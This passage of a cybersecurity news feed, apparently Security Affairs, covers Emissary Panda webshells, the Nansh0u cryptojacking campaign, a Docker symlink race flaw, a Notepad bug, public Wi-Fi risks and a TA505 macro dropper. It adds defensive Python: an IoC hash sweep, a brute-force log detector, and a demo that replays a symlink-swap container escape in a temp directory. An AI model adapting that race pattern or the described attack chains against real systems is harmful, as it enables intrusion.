  • read in-depth reviews of a VPN company on different platforms
  • ask for recommendations in different communities and see their views
  • check if the company is GDPR compliant
  • read their privacy features
  • check if they have had any scandals or breaches

With the right homework, you can find a trustworthy VPN that actually helps safeguard your online activity.


About The Author: Susan Alexandra is a cybersecurity and privacy enthusiast. She is a small business owner, traveler and investor in cryptocurrencies. Susan’s inbox is open for new ideas and stories; you can share story ideas at susanalexandra67(at)gmail(dot)com


Pierluigi Paganini

(SecurityAffairs – VPNs, privacy)

The post VPNpro research: this Chinese-linked company secretly owns 10 VPNs with 86 million installs appeared first on Security Affairs.

Emissary Panda APT group hit Government Organizations in the Middle East

Chinese Cyber-Spies Target Government Organizations in Middle East

Chinese APT group Emissary Panda has been targeting government organizations in two different countries in the Middle East.

Experts at Palo Alto Networks reported that the Chinese APT group Emissary Panda (aka APT27, TG-3390, Bronze Union, and Lucky Mouse) has been targeting government organizations in two different countries in the Middle East.

The Emissary Panda APT group has been active since 2010, targeting organizations worldwide, including U.S. defense contractors, financial services firms, and a national data center in Central Asia.


The group was involved in cyber espionage campaigns aimed at new generation weapons and in surveillance activities on dissidents and other civilian groups. 

The cyber espionage group leverages both readily available tools and custom malware in its operations; many of these tools have been around for years, but their code was updated for the recent attacks.

In April 2019, the group targeted organizations in two different countries in the Middle East. The hackers exploited the CVE-2019-0604 vulnerability to compromise SharePoint servers and install webshells on them.

Once the network is compromised, the attackers upload a variety of tools to perform additional activities, including dumping credentials and locating and pivoting to additional systems on the network.

Experts pointed out that attackers used tools to scan the network for systems vulnerable to CVE-2017-0144, the flaw exploited by the NSA-linked EternalBlue exploit.

The campaign appears related to attacks exploiting CVE-2019-0604 reported by the Saudi Arabian National Cyber Security Center and the Canadian Center for Cyber Security. The report by the Saudi Cyber Security Centre suggests threat actors are primarily targeting organizations within the kingdom. The Canadian Cyber Security Centre reported similar attacks aimed at delivering the China Chopper web-shell to ensure persistence in the target networks.

“the actors used these webshells to upload legitimate executables that they would use DLL sideloading to run a malicious DLL that has code overlaps with known Emissary Panda attacks. We also found the China Chopper webshell on the SharePoint servers, which has also been used by the Emissary Panda threat group.” states the report published by Palo Alto Networks.

Between April 1 and April 16, Palo Alto experts observed the threat actors using webshells to upload 24 unique executables on three SharePoint servers hosted by two different government organizations. Experts noticed that the same tools were uploaded across the three webshells, suggesting the involvement of the same attacker.

The longest activity involving one of the three webshells was observed on April 16, 2019.

The list of the tools uploaded by cyberspies included legitimate applications such as cURL, post-exploitation tools like Mimikatz, tools to scan for and exploit potential vulnerabilities in the target network, and custom backdoors such as HyperBro, which was used by Emissary Panda in the past. 

One of the webshells used by the attackers is a variant of the Antak webshell, other webshells appear related to the China Chopper webshell.

“We were able to gather one of the webshells with which we saw the actor interacting, specifically the error2.aspx file listed above. The error2.aspx file (SHA256: 006569f0a7e501e58fe15a4323eedc08f9865239131b28dc5f95f750b4767b38) is a variant of the Antak webshell, which is part of a tool created for red teaming called Nishang. ” continues the report.
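A file-hash sweep of the kind a defender would run on a SharePoint web root after reading the report, added here as an example and not part of the Unit 42 report or the original post. The only IoC it carries is the SHA256 of error2.aspx quoted above; the script-extension set, the directory layout and the placeholder file in the demo are constructed for this example, and the demo registers the placeholder's own hash as a constructed IoC so that a hit can be shown without shipping real webshell code.

```python
import hashlib
import os
import tempfile

# SHA256 of the error2.aspx Antak variant, as published in the Unit 42 report
# quoted above; it is the only file hash the post provides.
KNOWN_BAD_SHA256 = {
    "006569f0a7e501e58fe15a4323eedc08f9865239131b28dc5f95f750b4767b38":
        "Antak webshell variant (error2.aspx)",
}

# Assumed: server-side script types worth hashing under a SharePoint web root.
SCRIPT_EXTENSIONS = {".aspx", ".ashx", ".asmx"}


def sha256_hex(data):
    """SHA256 of an in-memory byte string as lowercase hex."""
    return hashlib.sha256(data).hexdigest()


def sha256_of_file(path, chunk_size=1 << 20):
    """Hash a file in chunks so large uploads never have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def sweep(root, iocs=KNOWN_BAD_SHA256, extensions=SCRIPT_EXTENSIONS):
    """Walk root, hash every file with a script extension and return
    (path relative to root, IoC label) for each hash present in iocs."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in extensions:
                continue
            full = os.path.join(dirpath, name)
            label = iocs.get(sha256_of_file(full))
            if label is not None:
                hits.append((os.path.relpath(full, root), label))
    return sorted(hits)


def demo():
    """Constructed web root: a benign page plus a placeholder file whose hash is
    registered as a constructed IoC; returns the sweep result."""
    root = tempfile.mkdtemp()
    layouts = os.path.join(root, "_layouts", "15")  # constructed subdirectory
    os.makedirs(layouts)
    with open(os.path.join(root, "default.aspx"), "w") as f:
        f.write('<%@ Page Language="C#" %>\n<html>benign</html>\n')
    sample = os.path.join(layouts, "error2.aspx")
    with open(sample, "w") as f:
        f.write("constructed placeholder, not a real webshell\n")
    iocs = dict(KNOWN_BAD_SHA256)
    iocs[sha256_of_file(sample)] = "constructed sample IoC"
    return sweep(root, iocs)
```

Hash matching only catches byte-identical copies of a known sample, so a sweep like this complements, rather than replaces, review of recently modified script files and of the web server's upload logs.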

Experts also uncovered the use of additional sideloaded DLLs in this campaign.

“The Emissary Panda threat group loaded the China Chopper webshell onto SharePoint servers at two Government organizations in the Middle East, which we believe with high confidence involved exploiting a remote code execution vulnerability in SharePoint tracked in CVE-2019-0604,” Palo Alto Networks concludes. 

“Once the adversary established a foothold on the targeted network, they used China Chopper and other webshells to upload additional tools to the SharePoint server to dump credentials, perform network reconnaissance and pivot to other systems.”

Pierluigi Paganini

(SecurityAffairs – cyberespionage, Emissary Panda)

The post Emissary Panda APT group hit Government Organizations in the Middle East appeared first on Security Affairs.

Nansh0u campaign already infected 50,000 MS-SQL and PHPMyAdmin Servers

Guardicore Labs uncovered a widespread cryptojacking campaign tracked as Nansh0u and aimed at Windows MS-SQL and PHPMyAdmin servers.

Security experts at Guardicore Labs uncovered a widespread cryptojacking campaign leveraging a malware dubbed Nansh0u. The malicious code aimed at Windows MS-SQL and PHPMyAdmin servers worldwide.

According to the experts, the malicious campaign is being carried out by a Chinese APT group.

According to the experts, the Nansh0u malware has already infected nearly 50,000 servers worldwide. Threat actors also delivered a sophisticated kernel-mode rootkit on compromised systems to prevent the malware from being terminated.

“During the past two months, the Guardicore Labs team has been closely following a China-based campaign which aimed to infect Windows MS-SQL and PHPMyAdmin servers worldwide.” reads the report published by Guardicore.

“Breached machines include over 50,000 servers belonging to companies in the healthcare, telecommunications, media and IT sectors. Once compromised, the targeted servers were infected with malicious payloads. These, in turn, dropped a crypto-miner and installed a sophisticated kernel-mode rootkit to prevent the malware from being terminated.”

The attacks date back to February 26; experts observed over seven hundred new victims per day. Researchers discovered 20 versions of malicious payloads, with new payloads created at least once a week and used in the campaign immediately after their creation.


Threat actors launch brute-force attacks against previously identified Windows MS-SQL and PHPMyAdmin servers that are exposed online.

Once successfully logged in with administrative privileges, threat actors execute a sequence of MS-SQL commands that download a malicious payload from a remote file server and execute it with SYSTEM privileges.

Attackers used two exploits tracked as apexp.exe and apexp2012.exe that trigger the privilege escalation vulnerability CVE-2014-4113. The exploits allow running any executable with SYSTEM privileges.

“Using this Windows privilege, the attacking exploit injects code into the winlogon process. The injected code creates a new process which inherits winlogon’s SYSTEM privileges, providing equivalent permissions as the prior version.” continues the analysis.
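The first step of the chain above, a password brute-force against an exposed MS-SQL service, is the one a server owner can see in their own logs before any payload lands. The detector below is an added example, not Guardicore's script or the campaign's IoCs: it parses the "Login failed/succeeded for user ... [CLIENT: ip]" lines that SQL Server writes to its ERRORLOG, flags a client that exceeds a failure threshold inside a sliding time window, and records whether a successful logon from the same client followed the burst. The log excerpt, client addresses, threshold and window are constructed for this example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Matches the logon audit lines SQL Server writes to ERRORLOG; lines such as
# "Error: 18456, Severity: 14, State: 8." carry no client and are skipped.
LOGON_LINE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+\s+Logon\s+"
    r"Login (?P<outcome>failed|succeeded) for user '(?P<user>[^']*)'.*"
    r"\[CLIENT: (?P<client>[^\]]+)\]"
)

# Constructed ERRORLOG excerpt: one client sprays the sa login and eventually
# succeeds; a second client produces a single unrelated failure.
SAMPLE_ERRORLOG = """\
2019-04-02 03:14:05.10 Logon       Error: 18456, Severity: 14, State: 8.
2019-04-02 03:14:05.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 198.51.100.23]
2019-04-02 03:14:06.02 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 198.51.100.23]
2019-04-02 03:14:06.90 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 198.51.100.23]
2019-04-02 03:14:07.75 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 198.51.100.23]
2019-04-02 03:14:08.61 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 198.51.100.23]
2019-04-02 03:14:09.44 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 198.51.100.23]
2019-04-02 03:20:11.00 Logon       Login failed for user 'reporting'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.9]
"""


def parse_logon(line):
    """Return a dict for a logon audit line, or None for any other line."""
    m = LOGON_LINE.match(line)
    if not m:
        return None
    return {
        "ts": datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S"),
        "outcome": m.group("outcome"),
        "user": m.group("user"),
        "client": m.group("client"),
    }


def detect_bruteforce(lines, threshold=5, window=timedelta(minutes=2)):
    """Flag each client with >= threshold failed logons inside a sliding window.
    A finding records the burst and, if one follows, the first successful logon
    from that client, which is the event that turns a spray into a compromise."""
    recent = defaultdict(deque)  # client -> timestamps of failures still inside the window
    findings = {}
    for line in lines:
        ev = parse_logon(line)
        if ev is None:
            continue
        client = ev["client"]
        if ev["outcome"] == "failed":
            if client in findings:
                findings[client]["failures"] += 1
                continue
            q = recent[client]
            q.append(ev["ts"])
            while ev["ts"] - q[0] > window:
                q.popleft()
            if len(q) >= threshold:
                findings[client] = {
                    "client": client,
                    "first_failure": q[0],
                    "failures": len(q),
                    "success_after_burst": None,
                }
        else:
            f = findings.get(client)
            if f is not None and f["success_after_burst"] is None:
                f["success_after_burst"] = (ev["ts"], ev["user"])
    return list(findings.values())
```

On a real server the successful-logon line only appears when login auditing is set to record successes as well as failures; without it the detector still reports the burst, but not the follow-on logon that matters most for triage.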

The payloads used in this campaign were droppers used to deliver a cryptocurrency miner to mine TurtleCoin cryptocurrency.

Experts observed many payloads dropping a kernel-mode driver with random file names into AppData/Local/Temp. The compile time of these files suggests they were created in 2016, but most AV engines still do not detect them as malicious.

The driver had a digital signature issued by the top Certificate Authority Verisign.

“We can confidently say that this campaign has been operated by Chinese attackers.” concludes the report.

“We base this hypothesis on the following observations:

  • The attacker chose to write their tools with EPL, a Chinese-based programming language.
  • Some of the file servers deployed for this campaign are HFSs in Chinese.
  • Many log files and binaries on the servers included Chinese strings, such as 结果-去重复 (“duplicates removed”) in logs containing breached machines, or 开始 (“start”) in the name of the script initiating port scans.”

Experts also published a list of IoCs (indicators of compromise) and a free PowerShell-based script that Windows admins can use to check whether their systems are infected.

Pierluigi Paganini

(SecurityAffairs – nansh0u malware, hacking)

The post Nansh0u campaign already infected 50,000 MS-SQL and PHPMyAdmin Servers appeared first on Security Affairs.

New Zealand Opposition Behind Budget Info Hack?

Two thousand unauthorized access attempts in 48 hours: that is how New Zealand’s Treasury Secretary, in coordination with the National Cyber Security Centre, described the budget information hacking incident that happened this week. New Zealand’s new public spending law, dubbed the “well-being budget”, is expected to be publicly disclosed in full on Thursday, May 30, 2019. Before that date, however, the National Party, currently in opposition, released snippets of the budget ahead of the official release.

“Following this morning’s media reports of a potential leak of Budget information, the Treasury has gathered sufficient evidence to indicate that its systems have been deliberately and systematically hacked. The Treasury takes the security of all the information it holds extremely seriously. It has taken immediate steps today to increase the security of all budget-related information and will be undertaking a full review of information security processes. There is no evidence that any personal information held by the Treasury has been subject to this hacking,” explained Gabriel Makhlouf, Treasury Secretary.

National Party leader Simon Bridges denied insinuations that the opposition had anything to do with the hacking incident, and accused the governing party of carrying out an alleged witch-hunt to discredit them. “There has been no hacking under any definition of that word … there has been nothing illegal or even approaching that. We have acted legally, appropriately, without any hacking or anything approaching that by the National Party. Or indeed what Grant Robertson is saying, that’s how we’ve got it, he is wrong. They [the government] are not in control of what they are doing, so they are lashing out and they are having a witch-hunt.” emphasized Bridges.

The government of New Zealand, through its Treasury Department, still confirms that the budget disclosure will proceed on the date originally planned before the hacking incident. The National Party leadership squarely places the blame on the incompetence of Treasury officials, particularly Makhlouf, for mishandling government data and for calling in the police as if cybercrime were a typical street crime. The opposition leader refused to explain how they were able to secure a copy of the well-being budget.

“There’s this potential talk around cybersecurity and so on — I was a minister in charge of cybersecurity for Bill English and what I know is departments like the Treasury, with big organizations, there are attempts at hacking and so on, if not every day, very commonly. I don’t know what the situation with that is, but they wouldn’t have called in the police if that was what they were worried about,” concluded Bridges.

New Zealand’s well-being budget aims to change the fiscal priorities of the government, with a stronger focus on funding action against domestic abuse, a better mental health care system and protection against child labor practices driven by poverty. With social services taking the lion’s share of the budget, the government of New Zealand is distancing itself from the focus on economic growth of previous years. The administration believes that domestic protection should receive more attention this year.

The post New Zealand Opposition Behind Budget Info Hack? appeared first on .

Google white hat hacker found code execution flaw in Notepad

The popular white hat hacker Tavis Ormandy has announced the discovery of a code execution vulnerability in Microsoft’s Notepad text editor.

The Google Project Zero researcher Tavis Ormandy announced the discovery of a code execution flaw in Microsoft’s Notepad text editor.

Ormandy reported the issue to Microsoft and, according to Google’s vulnerability disclosure policy, will wait 90 days before revealing technical details of the flaw.

Of course, Ormandy could also disclose the details of the vulnerability earlier, once Microsoft releases a security patch to address the issue.

Ormandy anticipated that the vulnerability is a memory corruption bug and shared via Twitter an image showing how to “pop a shell in Notepad.”

The image posted by Ormandy shows the vulnerability being exploited to launch a Command Prompt; the expert confirmed he has already developed a “real exploit” for the issue.


A message published by Chaouki Bekrar, founder of the zero-day broker Zerodium, confirms that the type of issue found by the Google white hat hacker is not uncommon. The real surprise, according to Bekrar, is to find an expert who reports it to Microsoft instead of exploiting it or attempting to sell it.

Stay tuned …

Pierluigi Paganini

(SecurityAffairs – Notepad, hacking)

The post Google white hat hacker found code execution flaw in Notepad appeared first on Security Affairs.

Using Public Wi-Fi? Your data can be hacked easily! Here’s How…

Public Wi-Fi is easily accessible by everyone, as much as free surfing sounds cool, it is risky as well. Let’s see how your data can be hacked easily.

In the contemporary world of networking, Wi-Fi has become a vital commodity. Wi-Fi is now installed in every kind of place, regardless of its size; from international airports to small kiosks, you can find an internet connection everywhere. Most of these networks are not run for an individual but are open for all. Public Wi-Fi is easily accessible by everyone, be it customers of the shop or travelers passing by, and it is completely free. This means you can connect to the network and enjoy surfing without paying a single dime.

Threats of Public Wi-Fi

Public Wi-Fi attracts millions of users each year. According to a survey, three out of four people connect to public Wi-Fi at some point or place, without giving it a second thought. As much as free surfing sounds cool, it is risky as well. There are multiple threats associated with public Wi-Fi because it is an open network that can be accessed by anyone, and that anyone includes cybercriminals. Some common threats associated with public Wi-Fi are listed here to warn users how insecure it can be:

  • Hackers and Predators

Public Wi-Fi and hotspots are the favorite hubs of hackers and predators. On public Wi-Fi, all the data that you send and receive is open for anyone to peek into. This data may include your personal and secret details like emails, social media accounts, passwords, bank details, and other crucial information. The hackers act as a man in the middle between you and your intended sites and record essential details of your accounts. These details can later be used for any unauthorized or illegal purpose.

  • Device Hijacking

Hackers and other cybercriminals are smarter than you think. They not only keep an eye on your online activities but also look for ways to invade your device. If the file sharing option of your device is turned on, you are likely to receive various “system upgrade” files to run. When you are on public Wi-Fi, these files are often malware, a kind of virus that hijacks your device and allows cybercriminals to access all the offline data saved on it.

  • Malicious Networks

When you are out in the streets or in public places, your device sees various public Wi-Fi networks. Some of them are secured with a password while others are simply open for all. The open public Wi-Fi is a real threat, as it can be created by bad guys with the wrong intentions. When your device is connected to a suspicious network, the hackers get hold of your device. They can not only peek into it but can also use it for illegal purposes. You will not even get any notification of the activities carried out through your device and will remain unaware.

  • Cookie Theft

Cookie theft is one of the major risks of using unencrypted sites. Sites that do not use an SSL (Secure Sockets Layer) connection are quite vulnerable, and cookies from these sites can be accessed easily by anyone. The risk of using such sites increases a great deal when you are on public Wi-Fi, as it provides zero protection against data theft.

  • Spying and Snooping

Spying on and keeping track of any user’s activity becomes a lot easier on public Wi-Fi. Small hardware devices known as packet sniffers or packet analyzers are often installed by service providers to monitor traffic on the network. But setting up these devices is very easy, and they can be installed by anyone, making the task of spies and detectives easier. Data obtained from these devices reveals the details of all your online activities carried out through the network and can put you in danger.

  • Propagating of Viruses

Public Wi-Fi often serves as a medium for propagating viruses. There are advanced viruses, known as computer worms, that propagate really fast through any network. Unlike classical computer viruses that require a particular program to run, these worms can infect any device on the same network as the affected one. Since a large number of people are simultaneously connected to the same public Wi-Fi network, there is a very high chance of your device becoming a victim.


Tips to Stay Safe on Public Wi-Fi

Staying safe on the internet is not an easy task, and it becomes more challenging while you are using public Wi-Fi. Free Wi-Fi has its own temptations and in some instances it becomes unavoidable to benefit from it. Though public Wi-Fi can never be completely secure, there are a few tips that will help make your online presence less vulnerable.

  • Enable Wi-Fi Only When Needed

Always keep your device’s Wi-Fi turned off when you are in public places and enable it only when needed. This may seem like an unnecessary hassle for frequent internet users, but it is a must while in public. If your device’s Wi-Fi is turned on, it can catch signals from all the available networks in your surroundings and will automatically connect to any open public Wi-Fi. Your device is at constant risk of connecting to malicious networks and being infected by worms when its Wi-Fi is active all the time.

  • Never Connect with Unknown Wi-Fi

Password-protected public Wi-Fi is a bit safer than open public Wi-Fi and is the better option. When a network is protected by a password, only authorized people can access it, which reduces the chances of having hackers on the same network. But if you really need to connect to an open public Wi-Fi, always confirm the name of the network with the relevant people around you. Rogue Wi-Fi hotspots usually use names similar to the actual business Wi-Fi, and you can easily fall prey to them if you are not cautious.

  • Browse Safely

You must always be cautious while browsing any site on the internet, as it is a world full of scams and cons. The risk multiplies when you are using public Wi-Fi to access an untrusted site. All sites that provide data encryption begin with HTTPS; these sites use an SSL connection and are marked by a lock sign in the address bar. Sites without an SSL connection take no responsibility for the data shared through them, which is a risk factor in itself, and this threat increases if your Wi-Fi connection is unsafe too.

  • Be Vigilant While Sharing Information

When you are on public Wi-Fi, all the data transactions to and from your device are vulnerable to spying and snooping. Be vigilant about what you share while on public Wi-Fi and never carry out any important transaction through open networks. Remember that your bank details and crucial business documents should not be put at risk through mere negligence.

Also, limit your social media use through public hotspots, as it paves the way for predators to reach your personal information. Logging in through a public network also gives cybercriminals easier access to your account details and passwords and makes your accounts vulnerable to hacking. To stay safe, log in to your accounts only if needed and sign out as soon as your task is done.

  • Opt for VPN

VPN is the safest mode of surfing the internet and provides the best cybersecurity. It is a Virtual Private Network that allocates you an anonymous proxy that is usually located at a different place than your current location. It allows you to camouflage your actual identity and geographical location and keeps you safe from predators and spies.

Because the tunnel encrypts everything between your device and the VPN server, nobody on the hotspot, including its operator, can read or tamper with your traffic or see which sites you visit. Note that the protection ends at the VPN server: from there your traffic continues as normal, and the VPN provider itself can see it, so pick a provider you trust and keep using HTTPS.

A VPN does not, on its own, filter malware or block attacks against your device; some providers bundle content filtering, but treat that as an extra, not as a replacement for a firewall and up-to-date software. VPNs are usually paid services, and worth paying for if you use public Wi-Fi often.

  • Secure Your Device

Your device needs protecting as much as your connection does. Enable the firewall on your device: it blocks unsolicited inbound connections from other devices on the same network, which is exactly the exposure a shared hotspot creates. Its pop-up notifications may be annoying, but even if you prefer to keep the firewall off most of the time, turn it on at least while using public Wi-Fi.

Anti-virus and anti-malware software is a must for device security. It protects your device from known malware and alerts you to suspicious activity. Keeping that software up to date matters even more if you use public Wi-Fi often.

  • Forget the Network

Whenever you connect to a public Wi-Fi network, remove (forget) the network and its password from your device when you leave. Saved networks reconnect automatically, without any prompt, whenever a network with the same name is in range, and an attacker can set up a hotspot with a saved name to make your device join it.

To Conclude

Public Wi-Fi cannot be avoided completely. It lets you connect with the world while on the go and without paying anything, and it is available everywhere from educational institutions to public buildings. Whether you are abroad for business or on vacation, free public Wi-Fi is certainly a blessing.

There are a number of threats associated with public Wi-Fi, especially networks without password protection, but you can keep yourself safe by following simple precautionary measures. These safety tips protect you from the common tricks and scams of attackers. If you are a frequent public Wi-Fi user, invest in a paid VPN and reputable anti-virus software for fuller protection of your device and online transactions.




If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

About the Author: Susan Alexandra is a cybersecurity and privacy enthusiast. She is a small business owner, traveler and investor in cryptocurrencies. Susan's inbox is open for new ideas and stories; you can share story ideas at susanalexandra67(at)gmail(dot)com

Pierluigi Paganini

(Security Affairs – Public Wi-Fi, hacking)

The post Using Public Wi-Fi? Your data can be hacked easily! Here’s How… appeared first on Security Affairs.

All Docker versions affected by an unpatched race condition issue

A race condition flaw that could be exploited by an attacker to read and write any file on the host system affects all versions of Docker.

Experts found a race condition vulnerability in all versions of Docker; it could be exploited by an attacker to read and write any file on the host system.

Technically the flaw, tracked as CVE-2018-15664, is a time-of-check to time-of-use (TOCTOU) bug: the filesystem can change between the moment a path is checked (here, resolved and confirmed to lie inside the container) and the moment the result of that check is used.

“In Docker through 18.06.1-ce-rc2, the API endpoints behind the ‘docker cp‘ command are vulnerable to a symlink-exchange attack with Directory Traversal, giving attackers arbitrary read-write access to the host filesystem with root privileges, because daemon/archive.go does not do archive operations on a frozen filesystem (or from within a chroot).” reads the description for this issue.


The issue resides in the FollowSymlinkInScope function, whose job is to resolve a given path safely, as though the process were inside the container. FollowSymlinkInScope is a wrapper around evalSymlinksInScope that returns an absolute path, handling paths in a platform-agnostic manner.

“If you’re not familiar with FollowSymlinkInScope, its job is to take a path and safely resolve it as though the process was inside the container. After the full path has been resolved, the resolved path is passed around a bit and then operated on a bit later (in the case of ‘docker cp’ it is opened when creating the archive that is streamed to the client).” reads the advisory published by SUSE. “As you may notice, if an attacker can add a symlink component to the path after the resolution but before it is operated on, then you could end up resolving the symlink path component on the host as root. In the case of ‘docker cp’ this gives you read and write access to any path on the host.”

‘docker cp’ copies content between a container and the local filesystem, and it is this copy path that the attack abuses.

“As far as I’m aware there are no meaningful protections against this kind of attack (other than not allowing “docker cp” on running containers — but that only helps with this particular attack through FollowSymlinkInScope). Unless you have restricted the Docker daemon through AppArmor, then it can affect the host filesystem,” continues the advisory.

A possible attack scenario sees an attacker active within a container while the host administrator runs docker cp to copy data in or out of that container.

Aleksa Sarai, the senior software engineer who discovered the issue, proposes as a fix modifying ‘chrootarchive’ so that archive operations run in an environment whose root is the container ‘rootfs’.

“The most complete solution to this problem would be to modify chrootarchive so that all of the archive operations occur with the root as the container rootfs (and not the parent directory, which is what causes the vulnerability since the parent is attacker-controlled),” said Sarai.

“Unfortunately, changes to this core piece of Docker are almost impossible (the TarUntar interface has many copies and reimplementations that would all need to be modified to be able to handle a new ‘root’ argument).”

Because the change touches a core part of Docker, it may not be feasible in the short term.

Another mitigation consists of pausing the container while its filesystem is being accessed; this protects against the more basic attacks that exploit the issue, but not against all of them.

At the time of writing, a security patch has been submitted upstream and is currently under review.

Aleksa Sarai also developed two scripts to trigger the vulnerability and get respectively read and write access to the host system.

“Attached is a fairly dumb reproducer which basically does a RENAME_EXCHANGE of a symlink to “/” and an empty directory in a loop, hoping to hit the race condition. Then our “user” attempts to copy a file from the path repeatedly.” explained the expert. “You can call it like this (note that since this requires exploiting a race condition, only a small percentage of the attempts succeed — however if I had made my reproducer a bit more clever about how quickly it does the RENAME_EXCHANGE it could be more likely to hit the race).”

Sarai measured a success rate of about 0.6% per attempt for his reproducer, which sounds low, but because the attacker can simply retry in a loop, running it for a dozen seconds or so is enough to win the race.
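To make the check-then-use gap concrete, here is an added example in Python; it is neither Docker's code nor Sarai's reproducer, and all names in it are hypothetical. `vulnerable_read` resolves a path to a host location and opens it later, the shape of the bug; `open_in_root` instead resolves every component relative to a file descriptor held inside the container root, with O_NOFOLLOW, and re-resolves symlinks against that root (the "root is the container rootfs" approach Sarai describes). `demo` builds a throwaway rootfs and a "host" directory under a temp dir (both constructed) and plays the winning interleaving deterministically; its `swap` helper replaces the directory with a symlink in two steps rather than with RENAME_EXCHANGE, which suffices for a single-threaded demonstration. Linux only.

```python
import errno
import os
import tempfile

MAX_SYMLINK_HOPS = 40


def vulnerable_read(root, rel, race_hook=lambda: None):
    """The CVE-2018-15664 pattern: resolve to a host path first (the check),
    then open that host path later (the use). `race_hook` stands in for the
    window in which a process inside the container can change the tree."""
    resolved = os.path.realpath(os.path.join(root, rel))                 # check
    if not resolved.startswith(os.path.join(os.path.realpath(root), "")):
        raise PermissionError("path escapes the container root")
    race_hook()                                                            # attacker acts here
    with open(resolved, "rb") as f:                                        # use, on a host path
        return f.read()


def _split(path):
    return [p for p in path.split("/") if p not in ("", ".")]


def _ident(fd):
    st = os.fstat(fd)
    return (st.st_dev, st.st_ino)


def open_in_root(root, rel, flags=os.O_RDONLY):
    """Open `rel` as though `root` were "/". Each component is opened relative
    to the previous directory fd with O_NOFOLLOW, and any symlink met on the
    way is re-resolved against the root fd, so no host path is ever built."""
    root_fd = os.open(root, os.O_RDONLY | os.O_DIRECTORY)
    try:
        return _walk(root_fd, rel, flags)
    finally:
        os.close(root_fd)


def _walk(root_fd, rel, flags):
    root_id = _ident(root_fd)
    dir_fd = os.dup(root_fd)
    parts = _split(rel)
    hops = 0
    try:
        while parts:
            name = parts.pop(0)
            if name == ".." and _ident(dir_fd) == root_id:
                continue                      # ".." at the root stays at the root
            last = not parts
            oflags = (flags if last else os.O_RDONLY | os.O_DIRECTORY) | os.O_NOFOLLOW
            try:
                fd = os.open(name, oflags, dir_fd=dir_fd)
            except OSError as exc:
                # A symlink under O_NOFOLLOW surfaces as ELOOP, or as ENOTDIR when
                # O_DIRECTORY is also set (kernel-version dependent); readlink confirms.
                if exc.errno not in (errno.ELOOP, errno.ENOTDIR):
                    raise
                try:
                    target = os.readlink(name, dir_fd=dir_fd)
                except OSError:
                    raise exc from None       # a real non-directory, not a symlink
                hops += 1
                if hops > MAX_SYMLINK_HOPS:
                    raise OSError(errno.ELOOP, "too many symlink hops")
                parts = _split(target) + parts
                if target.startswith("/"):    # absolute link: restart at the container root
                    os.close(dir_fd)
                    dir_fd = os.dup(root_fd)
                continue
            os.close(dir_fd)
            dir_fd = fd
        result, dir_fd = dir_fd, None
        return result
    finally:
        if dir_fd is not None:
            os.close(dir_fd)


def hardened_read(root, rel):
    with os.fdopen(open_in_root(root, rel), "rb") as f:
        return f.read()


def demo():
    """Constructed scenario: a fake container rootfs beside a 'host' directory
    standing in for the host filesystem. The attacker wins the race: the check
    sees an empty directory, the use sees a symlink pointing outside."""
    base = tempfile.mkdtemp()
    root, host = os.path.join(base, "rootfs"), os.path.join(base, "host")
    os.makedirs(os.path.join(root, "etc"))
    os.mkdir(host)
    with open(os.path.join(host, "secret"), "wb") as f:
        f.write(b"HOST-SECRET")
    with open(os.path.join(root, "etc", "hostname"), "wb") as f:
        f.write(b"container")
    os.symlink("/etc/hostname", os.path.join(root, "hostname-link"))  # absolute, in-scope link
    evil = os.path.join(root, "evil")
    os.mkdir(evil)

    def swap():
        # Stand-in for the RENAME_EXCHANGE loop in the reproducer: replace the
        # empty directory with a symlink to the host directory (not atomic here).
        os.rmdir(evil)
        os.symlink(host, evil)

    results = {"vulnerable": vulnerable_read(root, "evil/secret", race_hook=swap)}
    try:
        hardened_read(root, "evil/secret")
        results["hardened"] = "opened"
    except OSError as exc:
        results["hardened"] = type(exc).__name__
    results["in_scope_link"] = hardened_read(root, "hostname-link")
    results["dotdot"] = hardened_read(root, "../../etc/hostname")
    return results
```

With the hardened walker an attacker who swaps names mid-walk can still make the open fail or land on a different file inside the root, but never on a host path: every open is relative to a descriptor that was itself opened from the container root, and an absolute symlink target is re-walked from that root rather than from the host's "/".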


Pierluigi Paganini

(SecurityAffairs – Docker, hacking)

The post All Docker versions affected by an unpatched race condition issue appeared first on Security Affairs.

TA505 is expanding its operations

An attack against an Italian organization led the experts at Yoroi-Cybaze ZLab to shed light on ongoing operations attributed to TA505.

Introduction

In the last few days, during monitoring activities, Yoroi CERT noticed a suspicious attack against an Italian organization. The malicious email carried a highly suspicious sample, which led the ZLAB team to investigate its capabilities and possible attribution, uncovering a potential expansion of TA505 operations. The threat group is known for its recent campaigns against the banking and retail sectors, but the latest evidence indicates a potential expansion of its criminal operations to other industries too.

Technical Analysis

Hash: 0c88e285b6fc183c96b6f03ca5700cc9ca7c83dfccc6ad14a946d1868d1cc273
Threat: Dropper
Brief Description: Excel file with malicious macro
Ssdeep: 3072:Mc38TehYTdeHVhjqabWHLtyeGxml8/dgzxXYhh3vVYwrq 8/P5HKuPF1+bkm13Kkf:B38TehYTdeHVhjqabWHLty/xml8/dgNr

Table 1. Information about initial dropper

The intercepted attack starts with a spear-phishing email embedding a spreadsheet. The document is weaponized with malicious macro code that runs once the user enables macros, which the document's obfuscated view prompts them to do in order to see its content.

Figure 1. XLS document

To understand its capabilities, the macro code has been isolated and analyzed in detail. Part of the macro’s content is shown in the following figure.

Figure 2. Part of extracted macro

Surprisingly, the source code runs to more than 1600 lines and is highly obfuscated. Looking closer, we found it is full of junk instructions that declare and initialize variables that are never used, as shown in Figure 2. Only a small portion of the code actually starts the infection; the rest is junk.

